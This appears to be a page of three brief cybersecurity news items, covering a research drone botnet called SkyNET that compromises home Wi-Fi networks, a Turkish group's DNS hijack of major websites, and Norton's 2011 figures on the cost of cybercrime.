          "SkyNET" measures 13x18 inches and fitted with Wi-Fi, 3G mobile data link, and Linux OS. Researchers at the Stevens Institute of Technology have developed 'SkyNET', a stealth network that connects hosts to a botmaster through a mobile drone. Measuring 13x18 inches, the drone is fitted with Wi-Fi, 3G mobile data link, a Linux Operating System, and is programmed to scour an urban area and compromise wireless networks, mostly used at homes.

          Personal networks are the most unsecured networks on the Internet. They often contain no security controls, unpatched machines, no logging or auditing, bad password management, and typically run wireless radio with poor security. Researchers Theodore Reed, Joseph Geis and Sven Dietrich hope that their experiment could preempt attacks that use out-of-band communication to control Internet hosts.

          They say that the SkyNET is used by a botmaster to command their botnet(s) without using the Internet. The network comprises machines on home Wi-Fi networks in a proximal urban area, and one or more autonomous attack drones. When a host is compromised it joins both the Internet-facing botnet, and the sun-facing SkyNET, say the researchers. Subsequent drone flights are used to issue command and control without ever linking the botmaster to the botnet via the Internet.

          The researchers say that SkyNET takes advantage of poorly configured wireless network security, and poor trust configurations on mobile devices, to join networks and access devices locally using a mobile attack drone. The SkyNET drone is controllable via auto-pilot or via a 3G connection. The researchers say, "Once network access is acquired, the drone utilises an array of existing tools to compromise hosts, such as the Metasploit framework...The drone implements a 4-step attack procedure to enlist hosts into the network. We call this procedure PAAE (pilot, attack, attack, enlist)."

          To compensate for the limited computational power, the drone uses a 3G mobile data link to off-load computation to an Amazon Elastic Compute Cloud (EC2) GPU Cluster instance running cracking software.

The researchers say, "Once the drone has access to a compromised network its second task is to attack hosts; preferring non-mobile hosts. The botmaster can deploy an array of attack scripts or frameworks."

          "Once a host is compromised, the drone exchanges identification information, configures a callback mechanism, and secures the host as it is now a potential asset to SkyNET." They suggest that detection of a SkyNET may be possible by observing the behavior of the underlying botnet and discovering the geolocation of the bots.

Read More

Turkish hacker group hijacks high-profile websites

          However, the websites remain unaffected with this attack; the hacker group says they did this for fun
A Turkish hacker group diverted visitors to the websites of Vodafone, the Daily Telegraph, National Geographic and four other high-profile websites to the hacker group's own website on Sunday.

          The hackers were able to attack on computers that hold web address information, by deliberately mistranslating the real URL names the IP address of the hackers' site. The four other high-profile websites include UPS, Betfair, Acer and technology news site the Register.

          However, it was reported the seven websites that were attacked by the group were not affected in terms of losing or compromising data to the group. A group called Turk Guvenligi carried out the attack by targeting domain name system (DNS), which is used to route users to websites.

          The records relating to seven websites in DNS databases run by NetNames and Ascio were changed by the group in this attacke. Both are the subsidiaries of domain name management firm Group NBT.
The DNS server gets the first request when a user types an address, and then it translates the address into a computer-readable one known as a "dotted quad", according to the Guardian.

          The hackers here hacked the database for the DNS at the "domain name registrar" company to change the details recorded for the affected sites, following which the DNS servers around the world will start to copy and pass them on.

          This means that users can be directed to any web page by the hackers. The hacking group told the Guardian via Twitter that the purpose was: "Millions of dollars, large systems, small weaknesses and what I could do. Just for fun."

Read More

Cybercrime costs the world $114bn annually: Norton study

          431 million adult victims globally in the past year. Cybercrime costs the world $114bn annually, and costs additional $274bn due to time lost due to victims' cybercrime experiences, according to the Norton Cybercrime Report 2011.

          With 431 million adult victims globally in the past year and at an annual price of $388bn globally based on financial losses and time lost, cybercrime costs the world significantly more than the global black market in marijuana, cocaine and heroin combined to $288bn, the report said.

          More than two thirds of online adults (69%) have been a victim of cybercrime in their lifetime, while every second 14 adults become a victim of cybercrime, resulting in more than one million cybercrime victims every day.

          The report revealed that 10% of adults online have experienced cybercrime on their mobile phone.
According to the Symantec Internet Security Threat Report Volume 16, there were 42% more mobile vulnerabilities in 2010 compared to 2009.

          The number of reported new mobile operating system vulnerabilities increased from 115 in 2009 to 163 in 2010. Increased social networking and a lack of protection are likely to be some of the main culprits behind the growing number of cybercrime victims.

          While 74% of respondents say they are always aware of cybercrime, many are not taking the necessary precautions. 41% of adults indicated they don't have an up to date security software suite to protect their personal information online

Read More